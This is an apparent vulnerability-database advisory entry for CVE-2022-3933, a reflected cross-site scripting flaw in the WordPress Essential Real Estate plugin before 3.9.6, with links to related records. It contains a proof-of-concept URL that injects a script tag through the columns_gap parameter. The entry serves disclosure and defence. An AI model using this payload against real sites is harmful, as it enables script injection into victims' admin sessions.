Lucene search
CydaveWPEX-ID:6395F3F1-5CDF-4C55-920C-ACCC0201BAF4HistoryNov 17, 2022 - 12:00 a.m.
Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
2022-11-1700:00:00
cydave
108
real estate
security
cross-site-scripting
EPSS
0.001
Percentile
30.4%
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.
https://example.com/wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E%3C!--
Related
cvelist
cvelist
CVE-2022-3933 Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
2022-12-12 17:54:37
nvd
nvd
CVE-2022-3933
2022-12-12 18:15:12
wpvulndb
wpvulndb
Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
2022-11-17 00:00:00
prion
prion
Cross site scripting
2022-12-12 18:15:00
nuclei
nuclei
WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting
2023-03-18 22:07:09
cve
cve
CVE-2022-3933
2022-12-12 18:15:12